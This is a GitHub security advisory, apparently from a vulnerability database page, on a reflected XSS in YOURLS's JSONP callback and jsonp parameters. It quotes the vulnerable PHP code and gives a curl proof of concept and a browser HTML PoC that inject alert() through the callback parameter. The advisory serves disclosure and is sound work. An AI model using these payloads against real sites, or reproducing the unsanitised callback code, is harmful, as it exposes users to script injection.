ghsa-6mp4-q625-mxjp
Vulnerability from github
Summary
The callback and jsonp request parameters are directly concatenated into the response without any sanitization that allowing attackers to inject arbitrary JS code. When YOURLS_PRIVATE is set to false (public API mode), this vulnerability can be exploited by any unauthenticated attacker. In private mode, the XSS payload is still injected into the 403 response body though browser execution is blocked.
Details
Vulnerability exists in the JSONP callback handling chain:
``` yourls-api.php:127-128
if( isset( $_REQUEST['callback'] ) ) $return['callback'] = $_REQUEST['callback']; elseif ( isset( $_REQUEST['jsonp'] ) ) $return['callback'] = $_REQUEST['jsonp']; ```
``` includes/functions-api.php:127-128
$callback = isset( $output['callback'] ) ? $output['callback'] : ''; $result = $callback . '(' . json_encode( $output ) . ')'; ```
PoC
I. YOURLS instance with YOURLS_PRIVATE set to false in config.php or user authenticated to a private YOURLS instance.
II. curl "http://localhost:8080/yourls-api.php?action=version&format=jsonp&callback=alert(document.domain)//"
Expected response: alert(document.domain)//({"version":"1.10.2","callback":"alert(document.domain)\/\/"})
Browser PoC file:
```
pwnpwn
```
Impact
Public Mode (YOURLS_PRIVATE=false): Full exploitation, any unauthenticated user can trigger XSS. Private Mode (YOURLS_PRIVATE=true): XSS payload is injected into 403 response body but browser blocks script execution. However, authenticated users or admins accessing malicious links are still vulnerable.
{
"affected": [
{
"package": {
"ecosystem": "Packagist",
"name": "yourls/yourls"
},
"ranges": [
{
"events": [
{
"introduced": "0"
},
{
"last_affected": "1.10.2"
}
],
"type": "ECOSYSTEM"
}
]
}
],
"aliases": [],
"database_specific": {
"cwe_ids": [
"CWE-79"
],
"github_reviewed": true,
"github_reviewed_at": "2025-12-30T19:34:26Z",
"nvd_published_at": null,
"severity": "HIGH"
},
"details": "### Summary\n\nThe callback and **jsonp** request parameters are directly concatenated into the response without any sanitization that allowing attackers to inject arbitrary JS code. When **YOURLS_PRIVATE** is set to **false** (public API mode), this vulnerability can be exploited by any unauthenticated attacker. In private mode, the XSS payload is still injected into the 403 response body though browser execution is blocked.\n\n### Details\n\nVulnerability exists in the JSONP callback handling chain:\n\n```\nyourls-api.php:127-128\n\nif( isset( $_REQUEST[\u0027callback\u0027] ) )\n $return[\u0027callback\u0027] = $_REQUEST[\u0027callback\u0027];\nelseif ( isset( $_REQUEST[\u0027jsonp\u0027] ) )\n $return[\u0027callback\u0027] = $_REQUEST[\u0027jsonp\u0027]; \n```\n---\n\n```\nincludes/functions-api.php:127-128\n\n$callback = isset( $output[\u0027callback\u0027] ) ? $output[\u0027callback\u0027] : \u0027\u0027;\n$result = $callback . \u0027(\u0027 . json_encode( $output ) . \u0027)\u0027;\n```\n\n### PoC\n\nI. YOURLS instance with YOURLS_PRIVATE set to false in config.php or user authenticated to a private YOURLS instance.\n\nII. `curl \"http://localhost:8080/yourls-api.php?action=version\u0026format=jsonp\u0026callback=alert(document.domain)//\"\n`\n**Expected response:** `alert(document.domain)//({\"version\":\"1.10.2\",\"callback\":\"alert(document.domain)\\/\\/\"})`\n\nBrowser PoC file:\n\n```\n\u003c!DOCTYPE html\u003e\n\u003chtml\u003e\n\u003chead\u003e\u003ctitle\u003epwn\u003c/title\u003e\u003c/head\u003e\n\u003cbody\u003e\n\u003ch1\u003epwn\u003c/h1\u003e\n\u003cscript src=\"http://localhost:8080/yourls-api.php?action=version\u0026format=jsonp\u0026callback=alert(\u0027pwn\u0027);//\"\u003e\u003c/script\u003e\n\u003c/body\u003e\n\u003c/html\u003e\n```\n\n### Impact\n\nPublic Mode (YOURLS_PRIVATE=false): Full exploitation, any unauthenticated user can trigger **XSS.**\nPrivate Mode (YOURLS_PRIVATE=true): XSS payload is injected into 403 response body but browser blocks script execution. However, authenticated users or admins accessing malicious links are still vulnerable.",
"id": "GHSA-6mp4-q625-mxjp",
"modified": "2025-12-30T19:34:26Z",
"published": "2025-12-30T19:34:26Z",
"references": [
{
"type": "WEB",
"url": "https://github.com/YOURLS/YOURLS/security/advisories/GHSA-6mp4-q625-mxjp"
},
{
"type": "WEB",
"url": "https://github.com/YOURLS/YOURLS/commit/b1c6100e0aa6fef58c9c1a394ccc19352c3a480a"
},
{
"type": "PACKAGE",
"url": "https://github.com/YOURLS/YOURLS"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:L",
"type": "CVSS_V3"
}
],
"summary": "YOURLS is vulnerable to XSS through JSONP and Callback request parameters"
}
Sightings
| Author | Source | Type | Date |
|---|
Nomenclature
- Seen: The vulnerability was mentioned, discussed, or seen somewhere by the user.
- Confirmed: The vulnerability is confirmed from an analyst perspective.
- Published Proof of Concept: A public proof of concept is available for this vulnerability.
- Exploited: This vulnerability was exploited and seen by the user reporting the sighting.
- Patched: This vulnerability was successfully patched by the user reporting the sighting.
- Not exploited: This vulnerability was not exploited or seen by the user reporting the sighting.
- Not confirmed: The user expresses doubt about the veracity of the vulnerability.
- Not patched: This vulnerability was not successfully patched by the user reporting the sighting.